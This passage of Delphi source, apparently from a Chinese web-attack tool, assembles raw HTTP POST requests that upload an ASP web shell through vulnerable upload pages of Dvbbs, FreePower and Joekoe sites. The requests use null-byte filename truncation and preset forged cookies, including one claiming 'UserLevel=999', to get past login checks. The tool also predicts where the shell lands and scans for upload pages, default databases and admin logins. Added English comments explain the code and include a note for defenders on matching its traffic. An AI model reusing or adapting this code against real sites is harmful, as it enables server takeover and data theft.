Result := Result + 'Content-Disposition: form-data; name="file1"; filename="c:\' + MainForm.AspFilePath.Text + #0 + '.exe"' + H
else
Result := Result + 'Content-Disposition: form-data; name="file1"; filename="c:\' + ExtractFileName(MainForm.AspFilePath.Text) + #0 + '.exe"' + H;
end
else
begin {动力上传类型2}
if MainForm.RadPower2.Checked then
begin
Result := '';
Result := Result + '-----------------------------7d51c732705ec' + H;
Result := Result + 'Content-Disposition: form-data; name="FileName"; filename="C:\a.gif"' + H;
Result := Result + 'Content-Type: text/plain' + H + H;
Result := Result + GetAspFile + H + H;
Result := Result + '-----------------------------7d51c732705ec' + H;
Result := Result + 'Content-Disposition: form-data; name="FileName1"; filename="C:\up.asp "' + H;
Result := Result + 'Content-Type: text/plain' + H + H;
if MainForm.RdDefault.Checked then {如果是默认的asp木马}
Result := Result + GetAspFile + H + H
else
begin
ASPFile := TStringList.Create;
ASPFile.LoadFromFile(MainForm.AspFilePath.Text);
Result := Result + ASPFile.Text + H + H;
ASPFile.Free;
end;
Result := Result + '上传' + H;
Result := Result + '-----------------------------7d51c732705ec' + H;
Result := Result + 'Content-Disposition: form-data; name="PhotoUrlID"' + H + H;
Result := Result + '0' + H;
Result := Result + '-----------------------------7d51c732705ec--' + H;
Exit;
end;
end;
end;
if MainForm.Rd_Joekoe.Checked then {如果选中乔客上传}
Result := Result + 'Content-Disposition: form-data; name="file_name1"; filename="c:\nihao.gif"' + H;
if MainForm.RdCustom.Checked then {如果选中自定义上传类型 - 开始定义文件字段}
begin
if MainForm.RadFileName.Checked = False then
Result := Result + 'Content-Disposition: form-data; name="' + Trim(MainForm.EdFileField.Text) + '"; filename="c:\diy.' + MainForm.ComBoxType.Text + '"' + H
else
begin
if MainForm.RdDefault.Checked then
Result := Result + 'Content-Disposition: form-data; name="' + Trim(MainForm.EdFileField.Text) + '"; filename="c:\' + Trim(MainForm.AspFilePath.Text) + #0 + '.' + MainForm.ComBoxType.Text + '"' + H
else
Result := Result + 'Content-Disposition: form-data; name="' + Trim(MainForm.EdFileField.Text) + '"; filename="c:\' + ExtractFileName(MainForm.AspFilePath.Text) + #0 + '.' + MainForm.ComBoxType.Text + '"' + H;
end;
end;
Result := Result + 'Content-Type: text/plain' + H + H;
Result := Result + GetAspFile + H;
Result := Result + '-----------------------------7d22f8371b051c' + H;
Result := Result + 'Content-Disposition: form-data; name="fname"' + H + H;
Result := Result + 'D:\Newmm.gif' + H;
Result := Result + '-----------------------------7d22f8371b051c' + H;
Result := Result + 'Content-Disposition: form-data; name="Submit"' + H + H;
Result := Result + '上传' + H;
Result := Result + '-----------------------------7d22f8371b051c--' + H;
end;
procedure TMainForm.btnUpFileClick(Sender: TObject); {Combined upload - upload the ASP web shell}
// Assembles a raw HTTP/1.1 POST into the PostShell field and opens ClientSocket1
// towards port 80 of the host parsed from EdPostAddr; the request itself is written
// from ClientSocket1Connect once the connection is up.  The body is Dv_PostCdoe,
// which is defined outside this block (presumably the multipart builder above).
// GetHost / GetHostDir / GetPostPage are helpers not visible here - assumed to split
// the posted URL into host, directory and page.
const
  H = #13#10; // CRLF, the HTTP line terminator
var
  Url: string;
begin
  // Address sanity check: non-blank and containing a '.', and (after stripping a
  // leading http://) containing a '/'.  Both failures show the same message box.
  if (Trim(EdPostAddr.Text) = '') or (Pos('.', EdPostAddr.Text) = 0) then {validate the address}
  begin
    application.MessageBox('请输入正确的上传地址!', '提示', 48);
    Exit;
  end;
  Url := EdPostAddr.Text;
  Url := StringReplace(Url, 'http://', '', [rfIgnoreCase]);
  if Pos('/', Url) = 0 then
  begin
    application.MessageBox('请输入正确的上传地址!', '提示', 48);
    Exit;
  end;
  try
    if RdCustomASP.Checked then {a user-chosen ASP file}
      if FileExists(AspFilePath.Text) = False then {prompt when the file path cannot be found}
      begin
        Application.MessageBox('找不到文件路径,请重新选择你所要上传的文件!', '错误提示', 64);
        Exit;
      end;
    PostShell := ''; {reset the request buffer}
    ClientSocket1.Close;
    ClientSocket1.Host := GetHost(EdPostAddr.Text); {target host}
    ClientSocket1.Port := 80; {plain HTTP only - there is no TLS path in this block}
    // EdShellPath is filled with a per-upload-type directory plus the file name
    // (presumably the location where the uploaded file is expected to appear).
    if Rd_Dvbbs.Checked then {Dvbbs upload selected}
    begin
      if RdDefault.Checked then {default file selected}
        EdShellPath.Text := GetHostDir(EdPostAddr.Text) + '/' + AspFilePath.Text
      else
        EdShellPath.Text := GetHostDir(EdPostAddr.Text) + '/' + ExtractFileName(AspFilePath.Text);
    end // if Rd_Dvbbs.Checked
    else
      if Rd_FreePower.Checked then {FreePower upload selected}
      begin
        if RadPower1.Checked then {FreePower upload - type 1}
        begin
          if RdDefault.Checked then {default file selected}
            EdShellPath.Text := GetHostDir(EdPostAddr.Text) + '/UploadSoft/' + AspFilePath.Text
          else
            EdShellPath.Text := GetHostDir(EdPostAddr.Text) + '/UploadSoft/' + ExtractFileName(AspFilePath.Text);
        end
        else
        begin
          if RadPower2.Checked then {type 2: no path prediction, user is told to look it up}
            EdShellPath.Text := '自己手动查找WEBSHELL路径!';
        end;
      end // if Rd_FreePower.Checked
      else
        if Rd_Joekoe.Checked then
        begin
          if RdDefault.Checked then
            EdShellPath.Text := GetHostDir(EdPostAddr.Text) + '/upload/other/' + AspFilePath.Text
          else
            EdShellPath.Text := GetHostDir(EdPostAddr.Text) + '/upload/other/' + ExtractFileName(AspFilePath.Text);
        end; // if Rd_Joekoe.Checked
    // Request line and headers.  Referer is the posted URL itself and the Cookie
    // header is whatever EdtCookies holds (Rd_DvbbsClick installs preset values).
    PostShell := PostShell + 'POST ' + GetPostPage(EdPostAddr.Text) + ' HTTP/1.1' + H;
    PostShell := PostShell + 'Referer: ' + EdPostAddr.Text + H;
    PostShell := PostShell + 'Host: ' + GetHost(EdPostAddr.Text) + H;
    PostShell := PostShell + 'Content-Length: ' + IntToStr(length(Dv_PostCdoe)) + H; {declared body length}
    PostShell := PostShell + 'Cookie: ' + EdtCookies.Text + H + H;
    PostShell := PostShell + Dv_PostCdoe + H;
    ClientSocket1.Open; {connect; the write happens in OnConnect}
  except
    // NOTE(review): every exception raised inside the try block is swallowed
    // silently, so failures here leave no trace for the user.
  end;
end;
procedure TMainForm.ClientSocket1Connect(Sender: TObject; {Combined upload - submit the request}
  Socket: TCustomWinSocket);
// Fired once the TCP connection opened in btnUpFileClick is established; writes the
// pre-built PostShell request in a single SendText call.  The reply is handled in
// ClientSocket1Read.
begin
  Socket.SendText(PostShell); {send the buffered request}
end;
procedure TMainForm.ClientSocket1Read(Sender: TObject; {Combined upload - receive the server's reply}
  Socket: TCustomWinSocket);
// Each OnRead event overwrites Memoinfo.Text with the chunk just received and
// scrolls the memo to the bottom.  If that chunk contains '成功' ("success") the
// socket is deactivated and a confirmation message box is shown.
begin
  Memoinfo.Text := Socket.ReceiveText;
  Memoinfo.Perform(WM_VSCROLL, SB_Bottom, 0); // scroll the memo to its last line
  if Pos('成功', Memoinfo.Text) > 1 then
  begin
    ClientSocket1.Active := False;
    application.MessageBox('程序提示:已成功上传!', '提示', 64);
  end;
end;
procedure TMainForm.ClientSocket1Error(Sender: TObject; {Combined upload - handle socket errors}
  Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
  var ErrorCode: Integer);
// Winsock error 11001 (WSAHOST_NOT_FOUND, name resolution failed) is reported to the
// user as a bad address; every other error code is silent.  Setting ErrorCode to 0
// tells TClientSocket not to raise ESocketError for this event; the socket is then
// closed and the component deactivated.
begin
  if ErrorCode = 11001 then
    Application.MessageBox('请确认提交地址是否正确!', '提示', 64);
  ErrorCode := 0; // suppress the component's own exception for this error
  Socket.Close;
  ClientSocket1.Active := False;
end;
procedure TMainForm.Rd_DvbbsClick(Sender: TObject); {Combined upload - choose the upload type}
// Shared OnClick for the four upload-type radio buttons, dispatched on the sender's
// Tag: 0 Dvbbs, 1 FreePower (shows GBPower), 2 Joekoe, 3 custom.  All tags first
// reset the controls to the non-custom layout; tag 3 then switches them over, clears
// the shell path and cookies, and shows the custom field-name controls.  Tags 0-2
// fill in the hint labels and install a preset EdtCookies value.
// Defender note: the literal cookie strings for tags 0-2 are fixed in the binary, so
// they are reliable log / WAF match strings for traffic generated by this tool.
begin
  LbShellAddr.Enabled := True;
  EdShellPath.Enabled := True;
  BtnOpenShell.Enabled := True;
  GBPower.Visible := False;
  GroupBox4.Visible := False;
  Label43.Visible := False;
  Label42.Visible := False;
  Label36.Visible := False;
  ComBoxType.Visible := False;
  EdPathField.Visible := False;
  EdFileField.Visible := False;
  case TRadioButton(Sender).Tag of
    0:
      begin
        LbHint.Caption := '漏洞页面: http://www.xxx.com/bbs/upfile.asp';
        LbUpinfo.Caption := '动网上传功能介绍: 无需抓包,使用默认Cookies既可直接上传!若失败,请自行抓包填写Cookies!';
        EdtCookies.Text := 'iscookies=0;';
      end;
    1:
      begin
        GBPower.Visible := True; // FreePower has two sub-types (RadPower1/RadPower2)
        LbHint.Caption := '漏洞页面: http://www.xxx.com/upfile_soft.asp [软件] http://www.xxx.com/Upfile_SoftPic.asp [图片]';
        LbUpinfo.Caption := '动力上传功能介绍: 无需抓包,使用默认Cookies既可直接上传!若失败,请自行抓包填写Cookies!';
        EdtCookies.Text := 'asp163=Password=49ba59abbe56e057&UserLevel=999&UserName=hackdiy;';
      end;
    2:
      begin
        LbHint.Caption := '漏洞页面: http://www.xxx.com/upload.asp?action=upfile';
        LbUpinfo.Caption := '乔客上传功能介绍: 无需抓包,使用默认Cookies既可直接上传!若失败,请自行抓包填写Cookies!';
        EdtCookies.Text := 'joekoe%5Fonline=onlines=1&login%5Fpassword=49ba59abbe56e057&guest%5Fname=&iscookies=yes&login%5Fusername=hackdiy';
      end;
    3:
      begin {custom upload selected}
        LbHint.Caption := '';
        LbUpinfo.Caption := '自定义上传功能介绍: 通过手动抓包,自定义路径字段和自定义文件字段,同时手动填写Coookies!';
        LbShellAddr.Enabled := False;
        EdShellPath.Enabled := False;
        BtnOpenShell.Enabled := False;
        GBPower.Visible := False;
        EdShellPath.Clear;
        EdtCookies.Clear; // no preset cookies for the custom type
        GroupBox4.Visible := True;
        Label43.Visible := True;
        Label42.Visible := True;
        Label36.Visible := True;
        ComBoxType.Visible := True;
        EdPathField.Visible := True;
        EdFileField.Visible := True;
      end;
  end;
end;
procedure TMainForm.AspFilePathKeyPress(Sender: TObject; var Key: Char); {Combined upload - restrict the file name}
// When the default-file option is selected, only ASCII letters, digits, '.',
// backspace (#8), tab (#9) and Enter (#13) are accepted in AspFilePath; any other
// key is cancelled by setting Key to #0.  NOTE(review): the set test assumes an
// 8-bit Char; on a Unicode Delphi the check is not a complete filter - TODO confirm.
begin
  if RdDefault.Checked then
  begin
    if not (key in ['0'..'9', 'a'..'z', 'A'..'Z', '.', #8, #9, #13]) then
      key := #0;
  end;
end;
procedure TMainForm.AspFilePathButtonClick(Sender: TObject); {Combined upload - pick the file to upload}
// Only active when the custom-file option is selected: shows the OpenFile dialog
// (asp / php / cgi / all-files filter, default extension asp) and, if confirmed,
// copies the chosen path into AspFilePath.
begin
  if RdCustomASP.Checked then {user-chosen ASP file}
  begin
    OpenFile.DefaultExt := 'asp';
    OpenFile.Filter := 'asp文件 (*.asp)|*.asp|php文件 (*.php)|*.php|cgi文件 (*.cgi)|*.cgi|全部文件 (*.*)|*.*';
    if OpenFile.Execute then
      AspFilePath.Text := OpenFile.FileName;
  end;
end;
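procedure TMainForm.SiteListClick(Sender: TObject); {Side-site check - click on a virtual-host site}
// Copies the clicked SiteList entry (minus the ' √' "visited" marker that
// SiteListDblClick appends) into EdURL and EdOtherSite as an http:// URL.
// Guarded against an empty list and against no selection (ItemIndex = -1), which
// would otherwise raise a list-index exception on the Items[] access.
var
  S: string;
begin
  if (SiteList.Items.Text = '') or (SiteList.ItemIndex < 0) then
    Exit;
  S := 'http://' + StringReplace(SiteList.Items[SiteList.ItemIndex], ' √', '', [rfReplaceAll]);
  EdURL.Text := S;
  EdOtherSite.Text := S;
end;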
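procedure TMainForm.SiteListDblClick(Sender: TObject); {Side-site check - browse the virtual-host site}
// Marks the double-clicked SiteList entry with ' √', copies it into EdURL and
// EdOtherSite as an http:// URL, navigates Webbrowser1 to it and starts the
// GetAlexa worker thread (defined elsewhere) that checks the site's ranking.
// Guarded against an empty list and against no selection (ItemIndex = -1), which
// would otherwise raise on the Items[] access.
var
  TmpStr: string;
  D: DWORD; // receives the thread id; the handle returned by BeginThread is discarded
begin
  if (SiteList.Items.Text = '') or (SiteList.ItemIndex < 0) then
    Exit;
  PageControl2.TabIndex := 0;
  // Strip any existing marker before re-adding it so repeated clicks do not stack.
  TmpStr := StringReplace(SiteList.Items[SiteList.ItemIndex], ' √', '', [rfReplaceAll]);
  SiteList.Items[SiteList.ItemIndex] := TmpStr + ' √';
  EdURL.Text := 'http://' + TmpStr;
  EdOtherSite.Text := 'http://' + TmpStr;
  Webbrowser1.Navigate(TmpStr);
  RzSplitter1.Percent := 89;
  LbShowprogress.Caption := '读取连接地址中...';
  BeginThread(nil, 0, @GetAlexa, nil, 0, D); {start the ranking-check thread}
end;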
procedure TMainForm.N3Click(Sender: TObject);
// Menu item handler: closes the main form.
begin
  Self.Close;
end;
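procedure ExecuteData;
// Re-opens MainForm.ADOQuery2 on the scan table matching the selected scan-kind
// radio button (upload pages / default databases / admin logins).  TableName is
// only ever one of three literals, so the string-built SELECT is not injectable.
// If no radio button is checked the query is closed and left closed instead of
// issuing a malformed 'select * from ' statement (the original relied on the
// implicit empty-string initialisation of TableName and then opened it anyway).
var
  TableName: string;
begin
  TableName := '';
  if MainForm.RabUpFile.Checked then
    TableName := 'Scan_UpFile'
  else if MainForm.RabDefaultData.Checked then
    TableName := 'Scan_DefaultData'
  else if MainForm.RabAdminLogin.Checked then
    TableName := 'Scan_AdminLogin';
  MainForm.ADOQuery2.Close;
  if TableName = '' then
    Exit; // nothing selected: callers see a closed dataset rather than an ADO error
  MainForm.ADOQuery2.SQL.Text := 'select * from ' + TableName;
  MainForm.ADOQuery2.Open;
end;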
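procedure TMainForm.BtnInsertClick(Sender: TObject); {Scan upload pages - insert & select all & invert & import}
// Shared handler for the page-list buttons, dispatched on the button's Tag:
//   0 - ask the user for a page path, add it to ClbPage (checked) and append a
//       matching row to the scan table selected by ExecuteData;
//   1 - delete the selected ClbPage entry and the corresponding ADOQuery2 row.
// The original indexed s[1] before checking that s was non-empty, which raised
// (and was silently swallowed) when the dialog was confirmed with an empty path;
// the emptiness check now comes first and the outcome (nothing added) is the same.
var
  s: string;
  b: boolean;
begin
  try
    case TButton(Sender).Tag of
      0:
        begin
          s := '';
          b := InputQuery('添加检测页面', '添加页面 ', s);
          if not b then
            Exit;
          if s = '' then
            Exit; // must be checked before s[1] is read
          if s[1] <> '/' then
            s := '/' + s
          else if Length(s) < 2 then
            Exit; // a bare '/' is not a page
          ClbPage.Items.Add(s);
          ClbPage.ItemIndex := ClbPage.Count - 1; // select the newly added entry
          ClbPage.Checked[ClbPage.Count - 1] := True;
          ExecuteData;
          // Mirror the entry into the scan table for the selected scan kind.
          if RabUpFile.Checked then
            ADOQuery2.AppendRecord([nil, s, '用户添加上传页面'])
          else if RabDefaultData.Checked then
            ADOQuery2.AppendRecord([nil, s, '用户添加数据库'])
          else if RabAdminLogin.Checked then
            ADOQuery2.AppendRecord([nil, s]);
        end;
      1:
        begin
          if ClbPage.ItemIndex < 0 then
          begin
            Application.MessageBox('请先选择你要删除的页面!', '提示', 64);
            Exit;
          end;
          ExecuteData;
          // 32 = MB_ICONQUESTION; 6 = IDYES.
          if Application.MessageBox('你确定要删除该页面吗?', '提示', 32 + MB_YESNO) = 6 then
          begin
            // Assumes list position and dataset record order match 1:1 - TODO confirm.
            ADOQuery2.RecNo := ClbPage.ItemIndex + 1;
            ADOQuery2.Delete;
            ClbPage.DeleteSelected;
          end;
        end;
    end;
  except
    // NOTE(review): swallows every exception, including ADO failures; the user
    // gets no feedback when the database update did not happen.
  end;
end;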
procedure TMainForm.btnLoadScanSiteClick(Sender: TObject); {扫描上传页面 - 载入部分}
var
i: integer;
b: Boolean;
s: string;
begin
case TSpeedButton(Sender).Tag of
0:
begin
if SiteList.Items.Text = '' then {载入查询网址}
ScanListBox.Items.Text := '没有发现任何网址,请查询完毕后再单击载入!'
else
begin
ScanListBox.Clear;
for i := 0 to SiteList.Count - 1 do
ScanList